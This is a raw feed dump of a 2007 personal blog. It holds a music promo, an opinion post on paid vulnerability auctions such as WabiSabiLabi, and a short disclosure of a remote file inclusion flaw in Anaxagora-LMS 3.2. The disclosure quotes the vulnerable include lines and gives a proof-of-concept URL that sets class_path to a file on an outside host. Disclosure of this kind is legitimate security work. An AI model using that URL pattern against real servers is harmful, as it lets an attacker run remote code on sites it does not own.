tag:blogger.com,1999:blog-32547009098217600892007-07-28T19:01:30.800-04:00navairumBlogger4125tag:blogger.com,1999:blog-3254700909821760089.post-54619791823307355512007-07-23T14:45:00.000-04:002007-07-28T19:01:30.829-04:00This is why Sundays are the best day of the week!<br /><br />Check out <a href="http://www.thejoys.ca">The Joys</a> and be sure to pick up their cd <a href="http://www.thejoys.ca/new%20merch.php">Demolition Session</a> or pre-order their new one. Here's a dose of a Sunday night ritual.<br /><br /><a href="joys/july_22_2007.mpg">Download link here</a>navairumtag:blogger.com,1999:blog-3254700909821760089.post-53485593922240405672007-07-13T14:22:00.001-04:002007-07-13T15:52:20.337-04:00I was reading through an article on <a href="http://www.securityfocus.com/news/11474">Securityfocus</a> about the new vulnerability auction site <a href="http://www.wslabi.com/wabisabilabi/home.do?">WabiSabiLabi</a>. Basically theres a lot of commotion because people are scared that organized crime (and other bad people) will be able to buy these vulnerabilities and use them in targeted attacks. Now I can see that happening, but it causes me to stop and think.<br /><br />Any true 'organized crime' group probably doesn't need to buy these vulnerabilities because they have their own hackers, and they more-than-likely have their own vuln's. Maybe it would save them time to just spend $2000 and get a PoC, but I don't think they would need it.<br /><br />Maybe I'm a little biased about this article, but every blog I read about it is saying how finally researchers have a chance to earn something from their work. Damn right! Why should you spend x amount of hours researching a vulnerability, then notify the vendor (who probably wont take action soon, if ever) and get nothing out of it? I like the idea of actually getting paid for your research, especially since not everybody has a high paying job.<br /><br />My favorite quote from the article:<br /><blockquote><span class="body"> "We do not believe that offering compensation for vulnerability information is the best way we can help protect our customers," the software giant said in a statement sent to SecurityFocus. "Our policy is to credit finders who report vulnerabilities to us in a responsible manner."</span></blockquote>Also, I'm a Microsoft customer, I feel that if they paid for vulnerabilities they would have a lot more submissions, which would in turn make a more secure operating system (aka protecting their customers)<br />I know I would much rather get 'credit' from Microsoft as opposed to money for rent....navairumtag:blogger.com,1999:blog-3254700909821760089.post-7301003013512869202007-07-12T13:24:00.000-04:002007-07-13T15:47:08.789-04:00Simple remote file inclusion vulnerability.<br /><br />Product: Anaxagora-Lms<br />Version: 3.2<br />File: Common.inc.php<br /><br />class_path variable not initialized prior to including:<br /><br />include_once($class_path."bdd.class.php");<br />include_once($class_path."connexion.class.php");<br />include_once($class_path."membre.class.php");<br /><br />vulnerable url:<br /><span style="color: rgb(255, 0, 0);">LCMS/anaxagora/inc/Common.inc.php?class_path=http://tech.torc.k12.nm.us/techtools/phpinfo.txt?</span>navairumtag:blogger.com,1999:blog-3254700909821760089.post-73936270433247472222007-07-11T10:16:00.000-04:002007-07-11T10:17:07.923-04:00test!navairum